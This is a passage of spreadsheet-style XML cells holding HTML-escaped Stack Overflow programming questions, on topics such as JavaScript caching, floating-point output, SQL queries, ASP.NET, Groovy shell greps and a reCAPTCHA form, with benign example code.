&lt;pre&gt;&lt;code&gt;function mapTool (e) {
    **alert('mapTool'); //my alert**
  if (dTools.activeTool == "Drill Down Identify") {
    showLayer("loadData");
.....
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;when &lt;code&gt;alert(document.onmousedown);&lt;/code&gt; pops up in IE I can see the event code with my added alerts:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function mapTool (e) {
    **alert('mapTool'); //my alert**
  if (dTools.activeTool == "Drill Down Identify") {
    showLayer("loadData");
....
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In firefox the event code that pops up does NOT contain my alert:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function mapTool (e) {
  if (dTools.activeTool == "Drill Down Identify") {
    showLayer("loadData");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It's like the file is caching and firefox insists on getting the old cached .js file.  Pretty sure that's not what happening. Have tried updating the .jsp timestamp, renaming the javascript to a bogus name, then back again.  &lt;/p&gt;
&lt;p&gt;What's going on?&lt;/p&gt;
&lt;p&gt;ANy help much appreciated?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Conway's Game Of Life</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently writting a programe about Conway's Game of life and I am really a beginner of python, I don't know how to start at all. Anybody can help me with it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I fix my output for floating-point imprecision?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am doing some float manipulation and end up with the following numbers:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-0.5
-0.4
-0.3000000000000000004
-0.2000000000000000004
-0.1000000000000000003
1.10E-16
0.1
0.2
0.30000000000000000004
0.4
0.5
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The algorithm is the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var inc:Number = nextMultiple(min, stepSize);
trace(String(inc));
private function nextMultiple(x:Number, y:Number) {
    return Math.ceil(x/y)*y;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I understand the fact the float cannot always be represented accurately in a byte. e.g 1/3. I also know my stepsize &lt;strong&gt;being 0.1&lt;/strong&gt;. If I have the stepsize how could I get a proper output?&lt;/p&gt;
&lt;p&gt;The strange thing is that its the first time I've encountered this type of problem.
Maybe I dont play with float enough.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RegEx for extracting HTML Image properties</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a RegEx pattern for extracting all the properties of an image tag.&lt;/p&gt;
&lt;p&gt;As we all know, there are lots of malformed HTML out there, so the pattern has to cover those possibilities.&lt;/p&gt;
&lt;p&gt;I was looking at this solution &lt;a href="http://stackoverflow.com/questions/138313/how-to-extract-img-src-title-and-alt-from-html-using-php" rel="nofollow" title="How to Extract img src title and alt"&gt;http://stackoverflow.com/questions/138313/how-to-extract-img-src-title-and-alt-from-html-using-php&lt;/a&gt; but it didn't quite get it all:&lt;/p&gt;
&lt;p&gt;I come up something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(alt|title|src|height|width)\s*=\s*["'][\W\w]+?["']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there any possibilities I'll be missing or a more efficient simple pattern?&lt;/p&gt;
&lt;p&gt;EDIT:
&lt;br&gt;Sorry, I will be more specific, I'm doing this using .NET so it's on the server side.
&lt;br&gt;I've already a list of img tags, now I just need to parse the properties.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET ViewState postback with page refresh and bookmarks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The ASP.NET ViewState feature can sometimes be a double edged sword. I rely on it on most of my projects and it speeds up development considerably.&lt;/p&gt;
&lt;p&gt;My problem is that sometimes users will try to refresh a page which will cause the viewstate to be lost, other times the user might want to bookmark a page but when the get back the viewstate will be lost.&lt;/p&gt;
&lt;p&gt;Modern browsers will display a silly dialog when a user tries to refresh a page that is the result of a POST operation (e.g. asp postback) which is not desirable at all.&lt;/p&gt;
&lt;p&gt;I wonder is their a way to continue using ViewState and the postback model but without the drawback of the refresh dialog box. (and if possible bookmark the page.)&lt;/p&gt;
&lt;p&gt;An example of what i might want to do is having a page with records and checkboxes next to them, the user has the option to check all the records they want to delete and then click on a delete button. After the user clicks delete the records are analyzed on the server and the new page lists all the records that were selected with a confirm delete button. Now if the user clicks refresh they get this silly box to confirm if they want to post or not.&lt;/p&gt;
&lt;p&gt;I understant that ViewState is the result of using the Post Back model which means that most asp.net pages are the result of a POST operation, but i wonder if there are any ways around it.&lt;/p&gt;
&lt;p&gt;Workarounds that i thought might work: &lt;br /&gt;
In the Page_Unload event save the viewstate in the session with a unique id and redirect the user to the same page with the unique id as a query string parameter, after the page loads with a unique id in the url the viewstate is loaded from the session and injected into the current page. Such a method will allow to user to refresh the page and always get back the same results.&lt;/p&gt;
&lt;p&gt;P.S.
I understand that i can use &lt;code&gt;Response.Redirect()&lt;/code&gt; and/or query strings but i want to use the simplicity of &lt;code&gt;ViewState&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Testing for whitespace in SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got some blank values in my table, and I can't seem to catch them in an IF statement. &lt;/p&gt;
&lt;p&gt;I've tried&lt;/p&gt;
&lt;p&gt;&lt;code&gt;IF @value = ''&lt;/code&gt; and &lt;code&gt;if @value = NULL&lt;/code&gt; and neither one catches the blank values. Is there any way to test whether or not a varchar is entirely whitespace?&lt;/p&gt;
&lt;p&gt;AHA! Turns out I was testing for null wrong. Thanks. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Child controller updating a label for a cell in parent table view</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a navigation view with a cell that has something as simple as a Date of Birth. When that particular row is clicked, a new controller get pushed into view with a UIDatePicker. Once a new date is selected, I'd imagine I need to do something in viewWillDisappear: for that particular cell's UITextField value. What's the best way for me to do that? Do I need to pass in a reference to the cell's indexPath in the childController, set it there, and reload the tableView's data?  &lt;/p&gt;
&lt;p&gt;Another tricky tidbit is let's say that my data source for the tableView is a dictionary with key/value pairs. When I call reloadData on the tableView, it'll re-read that dictionary without taking into note the date change my child controller has made. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What tools do you recommend to profile Rails apps?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been looking for profiling tools for Rails for a while. I'm currently playing and testing ruby-prof and railsbench, but I kinda frustrated with the amount of tweaking and mangling required to make then work.&lt;/p&gt;
&lt;p&gt;Althought I don't mind (much) the tweaking, I'd like to know if is there any other, more straight-forward and easy to use, tools to profile a Rails app? Which tools you recommend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert a string to a Guid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I did not find the TryParse method for the Guid.  Iâ€™m wondering how others handle converting a guid in string format into a guid type.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Guid Id;
try
{
    Id = new Guid(Request.QueryString["id"]);
}
catch
{
    Id = Guid.Empty;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Eclipse Custom Variable for Java Code Templates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you add a new variable to be inserted into a Java code template. How do I add a variable to the list in Window-&gt;Preferences-&gt;Java-&gt;Code Style-&gt;Code Templates-&gt;Code-&gt;New Java Files-&gt;Edit-&gt;Insert Variable... ?&lt;/p&gt;
&lt;p&gt;Currently my new files get created with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;${filecomment}
${package_declaration}
${typecomment}
${type_declaration}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like them to get created with something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;${begin_filecomment}
${package_declaration}
${typecomment}
${type_declaration}
${end_filecomment}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where begin_filecomment and end_filecomment appear in the Insert Variable list.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I use a variable in a grep with groovy?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to grep for lines with bunch of names, say "clientLogin=a@yahoo.com", "clientLogin=b@gmail.com" from a file.txt
file.txt has junk which is email=a@yahoo.com email=b@gmail.com. I need to filter these out&lt;/p&gt;
&lt;p&gt;Once I get these lines I need to grep for gmail and yahoo and get their counts&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List l = new ArrayList{a@yahoo.com, b@gmail.com}
def gmail = ['sh','-c','grep "clientLogin="$l.get(0) file.txt' | grep gmail | wc -l ]
def yahoo = ['sh','-c','grep "clientLogin="$l.get(1) file.txt' | grep yahoo| wc -l ]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This doesn't work. How can I substitute the $l.get(1) value dynamically?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;the problem is that ${l.get(0)} has to be inside the  " ", 
i.e. def gmail = ['sh','-c','grep "clientLogin=${l.get(0)}" file.txt' | grep gmail | wc -l ]
so that it will look like
def gmail = ['sh','-c','grep "clientLogin=a@yahoo.com" file.txt' | grep gmail | wc -l ]
but "clientLogin=${l.get(0)}" doesn't produce the result. I am not sure where I am going wrong. &lt;/p&gt;
&lt;p&gt;Thanks for your suggestion but it doesn't produce the result, at least when I tried it.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;file.txt has lot of junk and a pattern something like 
"Into the domain clientLogin=a@yahoo.com exit on 12/01/2008 etc.."&lt;/p&gt;
&lt;p&gt;hence I do &lt;/p&gt;
&lt;p&gt;def ex = ['sh','-c','grep "domain clientLogin=$client" file.txt'| grep "something more" | wc -l]&lt;/p&gt;
&lt;p&gt;that way I can chain the grep as I want and eventually land at the count I need.&lt;/p&gt;
&lt;p&gt;I am not sure if I can chain the greps if I use &lt;/p&gt;
&lt;p&gt;def ex = ['grep', "$client", 'file.txt']&lt;/p&gt;
&lt;p&gt;thanks for your input.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server Tool to script drop statements which have check existence statements before them?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have tried SQL Server 2008 Management Studio and other third party tools to script all database objects (views, SPs &amp;amp; tables) and I can't get anything to generate a one file script which has a drop statement preceded with an "If exists.." statement for every object.&lt;/p&gt;
&lt;p&gt;I need the "if exists" statement so I don't get any errors if an object doesn't exist.
The tool doesn't have to be for sql server 2008. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL query to calculate visit duration from log table</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a MySQL table LOGIN_LOG with fields ID, PLAYER, TIMESTAMP and ACTION. ACTION can be either 'login' or 'logout'. Only around 20% of the logins have an accompanying logout row. For those that do, I want to calculate the average duration.&lt;/p&gt;
&lt;p&gt;I'm thinking of something like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select avg(LL2.TIMESTAMP - LL1.TIMESTAMP)
from LOGIN_LOG LL1
inner join LOGIN_LOG LL2 on LL1.PLAYER = LL2.PLAYER and LL2.TIMESTAMP &amp;gt; LL1.TIMESTAMP
left join LOGIN_LOG LL3 on LL3.PLAYER = LL1.PLAYER
  and LL3.TIMESTAMP between LL1.TIMESTAMP + 1 and LL2.TIMESTAMP - 1
  and LL3.ACTION = 'login'
where LL1.ACTION = 'login' and LL2.ACTION = 'logout' and isnull(LL3.ID)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is this the best way to do it, or is there one more efficient?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How bad is ignoring Oracle DUP_VAL_ON_INDEX exception?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table where I'm recording if a user has viewed an object at least once, hence:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; HasViewed
     ObjectID  number (FK to Object table)
     UserId    number (FK to Users table)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Both fields are NOT NULL and together form the Primary Key.&lt;/p&gt;
&lt;p&gt;My question is, since I don't care how many times someone has viewed an object (after the first), I have two options for handling inserts.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Do a SELECT count(*) ... and if no records are found, insert a new record.&lt;/li&gt;
&lt;li&gt;Always just insert a record, and if it throws a DUP_VAL_ON_INDEX exceptions (indicating that there already was such a record), just ignore it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What's the downside of choosing the second option?&lt;/p&gt;
&lt;p&gt;UPDATE:&lt;/p&gt;
&lt;p&gt;I guess the best way to put it is : "Is the overhead caused by the exception worse than the overhead caused by the initial select?"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I have multiple php.ini files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to set the &lt;code&gt;include_path&lt;/code&gt; variable in my &lt;em&gt;php.ini&lt;/em&gt; file (&lt;code&gt;C:\Windows\php.ini&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;But, I want different &lt;code&gt;include_path&lt;/code&gt; values for different sites hosted on the same Windows server. How can I do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PHP new operator returning reference</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with some old PHP code that has a lot of the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$someVar =&amp;amp; new SomeClass();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Did the &lt;strong&gt;new&lt;/strong&gt; operator ever return a value, um, not by reference?  (That feels strange to type.  I feel like I'm losing my mind.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multi column primary keys?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example I have 2 tables, &lt;code&gt;Users&lt;/code&gt; and &lt;code&gt;UserRelations&lt;/code&gt;, and it is a one to many relationship.&lt;/p&gt;
&lt;p&gt;For the &lt;code&gt;UserRelations&lt;/code&gt; table, I can have an identity column and make it the primary key: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[RelationID] [int] IDENTITY(1,1) NOT NULL,
[UserID] [int] NOT NULL,
[TargetID] [int] NOT NULL,
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or I can design the table like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[UserID] [int] NOT NULL,
[TargetID] [int] NOT NULL,
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and make &lt;code&gt;UserID&lt;/code&gt; + &lt;code&gt;TargetID&lt;/code&gt; the primary key.&lt;/p&gt;
&lt;p&gt;My question is what are the implications of going with each design, which is better for performance?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Four nodes with a width of 25% don't fit next to each other?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a header node in which four child nodes reside.
None have borders, padding nor margins.
All four of them have the width:25%; css rule.
In Opera it works just fine, in IE the last block flips to the next line sometimes depending on the width of the window.&lt;/p&gt;
&lt;p&gt;I can solve it by giving one block a width of 24.8%, but Opera interprets that as 24% and thus leaves a wide open gap of 1% at the end of the blocks.&lt;/p&gt;
&lt;p&gt;How can I solve this? It would be ok for the last block to miss a pixel on the right.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find a list of SocketErrorCode and NativeErrorCode thrown by SocketException?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A SocketException has a SocketErrorCode and NativeErrorCode.
I would like to find a list where these codes (or the common onces)
are listed so I can respond in proper fasion.&lt;/p&gt;
&lt;p&gt;Does anybody know where to find such a list?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.Net: Read properties of and disable the screensaver and other power schemes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a long-running GUI application that outputs various statuses to the user.  The user wants to view every status but doesn't want to worry about the screensaver kicking in after the inactivity settings.&lt;/p&gt;
&lt;p&gt;Preferably in C#, how do I read the screensaver/power scheme settings (so I can reapply them when my app exits) and use settings appropriate for my app (basically disabling them)?&lt;/p&gt;
&lt;p&gt;EDIT:  I'm going to run my own tests on these answers before I mark either as a solution.  If someone has had success with either, please vote it up so I try it first.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multiple Font/Language support in Flash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Greetings,&lt;/p&gt;
&lt;p&gt;I'm in the middle of writing a Flash application which has multilingual support.  My initial choice of font for this was Tahoma, for its Unicode support.  The client prefers a non-standard font such as Lucida Handwriting.  Lucida Handwriting doesn't have the same, say, Cyrillic support as Tahoma, which poses a problem that there are a few ways to solve, and I'd like to ask for your advice on which is preferable:&lt;/p&gt;
&lt;p&gt;From what I understand, I could:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Give the client a list of fully Unicode-compatible (Cyrillic, Hebrew, Arabic, Traditional Chinese, East Asian, etc) fonts to choose from.  (I have no idea where to get such a list; my search of the web has resulted only in lists of partially unicode-compliant fonts.  Try &lt;a href="http://look.fo/list-of-unicode-compliant-fonts" rel="nofollow"&gt;http://look.fo/list-of-unicode-compliant-fonts&lt;/a&gt; as a good starting point to see where I looked).&lt;/li&gt;
&lt;li&gt;Depending on the client's location (which we already have), render in Lucida Handwriting for English-speaking users and in Tahoma for international users.  This may be somewhat of a headache; has anyone had any experience with this approach?&lt;/li&gt;
&lt;li&gt;Build a new font (IE, AlexeyMK Bold) which uses Lucida Handwriting for English and Tahoma for everything else.  This ads something like 500k to the weight of the Flash file, but should (if I understand correctly) only be loaded the first time.  &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;What do you advise?  Which of these are reasonable solutions, and which are completely out there?  Is there a way that I'm not thinking of?&lt;/p&gt;
&lt;p&gt;Much thanks!
Alexey&lt;/p&gt;
&lt;p&gt;EDIT: A good article on the subject: &lt;a href="http://www.itworld.com/print/58558" rel="nofollow"&gt;http://www.itworld.com/print/58558&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the shortest TSQL to concatenate a person's name which may contain nulls</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;3 fields: FirstName, MiddleName, LastName&lt;/p&gt;
&lt;p&gt;Any field can be null, but I don't want extra spaces. Format should be "First Middle Last", "First Last", "Last", etc.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>An algorithm to get the next weekday set in a bitmask</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got this small question - given a bitmask of weekdays (e.g., &lt;code&gt;Sunday = 0x01, Monday = 0x02, Tuesday = 0x04&lt;/code&gt;, etc...) and today's day (in a form of &lt;code&gt;Sunday = 1, Monday = 2, Tuesday = 3&lt;/code&gt;, etc...) - what's the most elegant way to find out the next day from today, that's set in the bitmask? By elegant I mean, is there a way to do this without if/switch/etc..., because I know the non-elegant way?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt; I probably should've mentioned (to make this more clear) that the variable holding the bitmask can have several of the days set, so for example (roughly):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uDay = Sunday | Monday;
today = Tuesday;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I need to get "Sunday"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the problems associated with serving pages with Content: application/xhtml+xml</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Starting recently, some of my new web pages (XHTML 1.1) are setup to do a regex of the request header &lt;code&gt;Accept&lt;/code&gt; and send the right HTTP response headers if the user agent accepts XML (Firefox and Safari do).&lt;/p&gt;
&lt;p&gt;IE (or any other browser that doesn't accept it) will just get the plain &lt;code&gt;text/html&lt;/code&gt; content type. &lt;/p&gt;
&lt;p&gt;Will Google bot (or any other search bot) have any problems with this? Is there any negatives to my approach I have looked over? Would you think this header sniffer would have much effect on performance?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Have any vb applications migrated to delphi?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to hear of the experiences of classic vb developers who migrated their applications to delphi rather than vb.net. How has it worked out? Are you glad or sorry that you didn't move to vb.net? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why are .Net programmers so afraid of exceptions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;First of all, I'm not trying to be critical of anyone here or saying that all .Net programmers are this way.  But I'm definitely noticing a trend:  .Net programmers seem to avoid exceptions like they're the plague.&lt;/p&gt;
&lt;p&gt;Of course, there's always the &lt;a href="http://blogs.msdn.com/oldnewthing/archive/2004/04/22/118161.aspx" rel="nofollow"&gt;Raymond Chen&lt;/a&gt; blog post about how hard exceptions can be to handle.  But that doesn't just apply to .Net.&lt;/p&gt;
&lt;p&gt;In a lot of other languages/environments, I don't notice that programmers are as likely to avoid exceptions as they are in .Net.  Heck, in Python, exceptions are thrown in normal program execution (iterators throw StopIteration exceptions).&lt;/p&gt;
&lt;p&gt;So what am I missing here?  Or am I totally off base in thinking that .net programmers avoid exceptions more than others?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Quick Test Pro (Regression test scripts) - Cruisecontrol.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Any one succeeded in integrating Quick Test Pro (QTP) automated test scripts in Cruisecontrol.net.&lt;/p&gt;
&lt;p&gt;if any one have an idea to run them unattended , in a schedule task or cruisecontrol.net &lt;/p&gt;
&lt;p&gt;will be more useful.#&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determine record in multi record html form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a html form, I'm displaying multiple records from a table, ready for update.&lt;/p&gt;
&lt;p&gt;Right now I use: &lt;code&gt;name=&amp;lt;column-name&amp;gt;_&amp;lt;pk-id&amp;gt; value=&amp;lt;value&amp;gt;&lt;/code&gt; for the fields.
Then in my python-script I go for:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for key in form.keys():
    if key.startswith('&amp;lt;name-A&amp;gt;_'):
        update &amp;lt;table&amp;gt; set &amp;lt;name-A&amp;gt; = &amp;lt;value&amp;gt; where pk=&amp;lt;pk-id&amp;gt;
    if key.startswith('&amp;lt;name-B&amp;gt;_'):
        update &amp;lt;table&amp;gt; set &amp;lt;name-B&amp;gt; = &amp;lt;value&amp;gt; where pk=&amp;lt;pk-id&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a more 'organic' way to handle multi-record forms?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How abstracted should MVC models be?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in the process of extending and improving a website that has quite a few structural problems. It looks very much like the developers before me had heard of MVC but didn't understand the ideas of abstraction or modularity. So the MVC "framework" is a) bespoke b) broken c) patched and d) there are several in use all at once. I intend to fix that.&lt;/p&gt;
&lt;p&gt;This is not the first time I've re-built a site's framework, BTW, but it is the first time I've had to fix an MVC framework. However, I'm coming up against some missing holes in the MVC knowledge here on SO. &lt;/p&gt;
&lt;p&gt;The first is how closely programmers seem to tie their SQL database with their models. This doesn't make sense to me: do programmers normally have the model looking after the data abstraction? (To me this is little better than putting SQL in raw PHP code.) Or is there a data access layer normally employed that "Does SQL"? I know from experience that the latter means the calling code doesn't have to worry about where the data is, or how to get it or how to write it: the API handles that. &lt;/p&gt;
&lt;p&gt;But what about the Models? Are they intended to be re-usable amongst different pages? Should they care about just where the data is stored? Shouldn't they be more concerned with handling the logic between data-fetch and data-show (e.g. turning a contact's group ID into a displayable name)? And data-save and data-write (e.g. figuring out how to turn $_POST values into savable data)?&lt;/p&gt;
&lt;p&gt;Maybe the MVC model really be DMVC - Data-Model-View-Controller.&lt;/p&gt;
&lt;p&gt;Lastly, although this is from a PHP point-of-view, how well do these concepts translate to a JSP site?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: Casting XPath to bool - Possible?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Greetings!&lt;/p&gt;
&lt;p&gt;I have an XML value that I'd like to use as a boolean value to toggle the visibility of a Panel.  I have something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:FormView id="MyFormView" runat="server" DataSourceID="MyXmlDataSource"&amp;gt;
    &amp;lt;ItemTemplate&amp;gt;
        &amp;lt;!-- some stuff --&amp;gt;
        &amp;lt;asp:Panel id="MyPanel" runat="server" Visible='&amp;lt;%# (bool)XPath("Menu/Show") %&amp;gt;'&amp;gt;
        &amp;lt;/asp:Panel&amp;gt;
        &amp;lt;!-- some more stuff --&amp;gt;
    &amp;lt;/ItemTemplate&amp;gt;
&amp;lt;/asp:FormView&amp;gt;
&amp;lt;asp:XmlDataSource id="MyXmlDataSource" runat="sever" DataFile="MyFile.xml" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, this throws an exception.  I've tried setting the value of Show in my XML to "true", "True", "0", but to no avail.  Is this even possible?  My XPath definitely works because I've tried moving &amp;lt;%# (bool)XPath("Menu/Show") %&gt; outside so that I can see its value and it is correct.  I have tried this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%#((bool)XPath("Menu/Show")).ToString() %&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this also throws an exception.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to install Hibernate Tools in Eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the proper way to install Hibernate Tools in Eclipse as a plugin?
The &lt;a href="http://www.hibernate.org/255.html"&gt;Hibernate site&lt;/a&gt; doesn't really give any instructions.&lt;/p&gt;
&lt;p&gt;Looking at the Hibernate Tools binary &lt;code&gt;HibernateTools-3.2.4.Beta1-R200810311334.zip&lt;/code&gt;, it appears that I can just unzip this in my eclipse directory. Do I just unzip it in my eclipse directory? This seems like a hacky was to install it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How much of the compiler should we know?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In order to write better code, is it worth to know deeply what the compiler does? &lt;/p&gt;
&lt;p&gt;Just how much would be enough? I'm not a bit scrubber, but I was thinking that knowing how the compiler operates would make me a better programmer. Am I wrong? &lt;/p&gt;
&lt;p&gt;If so, what resources would you recommend?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sharing Views</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it a good idea to share views between different controllers (using the Views/Shared folder)? I am creating my first MVC application and it requires some pieces of data that are similar to each other. They "explain" different things (and will therefore be stored in different tables) but they each have an Id, Name and Status. I can therefore use different controllers which then use the same View to display the data in a drop down list, allow the user to select one to edit or add a new one via a text box. Obviously I lose the ability to have strongly typed ViewPage data but besides that, would this be considered a good way to do this or am I better off creating a View for each controller to use?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python method arguments with spaces</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to create a simple file format/DSL which would allow my users to input data.  My system is in python and using python's parser is appealing. 
Syntax like this for defining a data element seems quite convenient.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Allocation(Param1 = Val1, Param2 = Val2 )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, it does not support param names with spaces.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Allocation(Param 1 = Val1, Param 2 = Val2 )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Python parser friendly versions can look as follows, but not very user friendly.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Allocation(("Param 1",Val1), ("Param 2",Val1) )
Allocation(**{"Param 1":Val1, "Param 2":Val1} )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a way to make this more readable in python?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you do inline delegates in vb.net like c#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to create an inline delegate in vb.net like you can in c#?&lt;/p&gt;
&lt;p&gt;For example, I would like to be able to do something inline like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myObjects.RemoveAll(delegate (MyObject m) { return m.X &amp;gt;= 10; });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;only in VB and without having to do something like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myObjects.RemoveAll(AddressOf GreaterOrEqaulToTen) 
Private Function GreaterOrEqaulToTen(ByVal m as MyObject)
    If m.x &amp;gt;= 10 Then 
         Return true
    Else
         Return False
    End If
End Function
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;-- edit --
I should have mentioned that I am still working in .net 2.0 so I won't be able to use lambdas.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with Recaptcha</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem with the form I'm using in my webpage. &lt;/p&gt;
&lt;p&gt;It allows the recaptcha but It also sends the email without validating the fields in the recaptcha box. This form is using Ajax and PHP.&lt;/p&gt;
&lt;p&gt;I've pasted the code next:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;div id="fields"&amp;gt;
&amp;lt;form action="javascript:alert('success!');"&amp;gt;
&amp;lt;label&amp;gt;Nombre&amp;lt;/label&amp;gt;&amp;lt;INPUT class="textbox" type="text" name="name" value=""&amp;gt;&amp;lt;br /&amp;gt;
&amp;lt;label&amp;gt;eMail&amp;lt;/label&amp;gt;&amp;lt;INPUT class="textbox" type="text" name="email" value=""&amp;gt;&amp;lt;br /&amp;gt;
